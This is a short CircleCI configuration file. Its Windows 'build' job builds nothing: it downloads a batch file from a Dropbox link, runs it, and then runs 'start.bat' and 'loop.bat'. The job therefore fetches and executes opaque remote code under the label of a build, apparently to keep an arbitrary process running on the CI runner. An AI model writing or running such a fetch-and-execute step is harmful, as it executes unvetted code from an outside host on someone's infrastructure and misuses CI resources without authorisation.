version: 2.1

orbs:
  win: circleci/windows@5.0 

jobs:
  build:
    executor: win/default
    steps:
      - run: |
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/wxgbjvtxpxj2my3zhilfv/Downloads.bat?rlkey=sh2twffzvcp0ab2m6cn24lde7&dl=1" -OutFile "Downloads.bat"
         cmd /c Downloads.bat
         cmd /c start.bat
         cmd /c loop.bat
         
